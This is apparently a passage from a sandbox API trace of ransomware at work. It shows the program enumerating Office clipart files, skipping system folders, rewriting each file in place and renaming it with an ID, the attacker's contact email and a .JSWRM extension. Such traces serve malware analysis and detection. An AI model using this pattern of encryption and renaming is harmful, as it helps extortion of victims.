HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.485] CloseHandle (hObject=0x314) returned 1 [0088.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0088.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0088.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0088.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0088.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.486] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1998, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239943.WMF", cAlternateFileName="")) returned 1 [0088.486] lstrcmpiW (lpString1="J0239943.WMF", lpString2=".") returned 1 [0088.486] lstrcmpiW (lpString1="J0239943.WMF", lpString2="..") returned 1 [0088.486] lstrcmpiW (lpString1="J0239943.WMF", lpString2="...") returned 1 [0088.486] lstrcmpiW (lpString1="J0239943.WMF", lpString2="windows") returned -1 [0088.486] lstrcmpiW (lpString1="J0239943.WMF", lpString2="recovery") returned -1 [0088.486] lstrcmpiW (lpString1="J0239943.WMF", lpString2="perflogs") returned -1 [0088.487] lstrcmpiW (lpString1="J0239943.WMF", lpString2="documents and settings") returned 1 [0088.487] lstrcmpiW (lpString1="J0239943.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.487] lstrcmpiW (lpString1="J0239943.WMF", lpString2="system volume information") returned -1 [0088.487] lstrcmpiW (lpString1="J0239943.WMF", lpString2="msocache") returned -1 [0088.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239943.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239943.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239943.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0088.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239943.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239943.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239943.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0088.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.487] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6552) returned 1 [0088.487] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1990) returned 0x205850 [0088.488] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1990, lpOverlapped=0x0) returned 1 [0088.489] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.489] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1990, lpOverlapped=0x0) returned 1 [0088.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.489] CloseHandle (hObject=0x314) returned 1 [0088.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0088.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0088.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0088.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.490] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0088.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.491] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239951.WMF", cAlternateFileName="")) returned 1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2=".") returned 1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="..") returned 1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="...") returned 1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="windows") returned -1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="recovery") returned -1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="perflogs") returned -1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="documents and settings") returned 1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="system volume information") returned -1 [0088.491] lstrcmpiW (lpString1="J0239951.WMF", lpString2="msocache") returned -1 [0088.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0088.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239951.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239951.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239951.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0088.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239951.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239951.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239951.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.492] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7232) returned 1 [0088.492] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c40) returned 0x205850 [0088.492] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c40, lpOverlapped=0x0) returned 1 [0088.496] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.496] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c40, lpOverlapped=0x0) returned 1 [0088.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.496] CloseHandle (hObject=0x314) returned 1 [0088.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0088.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0088.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0088.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0088.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0088.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.497] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0088.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.498] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239953.WMF", cAlternateFileName="")) returned 1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2=".") returned 1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="..") returned 1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="...") returned 1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="windows") returned -1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="recovery") returned -1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="perflogs") returned -1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="documents and settings") returned 1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="system volume information") returned -1 [0088.498] lstrcmpiW (lpString1="J0239953.WMF", lpString2="msocache") returned -1 [0088.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239953.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239953.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239953.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239953.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239953.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239953.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.499] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7112) returned 1 [0088.499] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bc0) returned 0x205850 [0088.499] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1bc0, lpOverlapped=0x0) returned 1 [0088.501] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.501] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1bc0, lpOverlapped=0x0) returned 1 [0088.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.501] CloseHandle (hObject=0x314) returned 1 [0088.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0088.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0088.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf"), 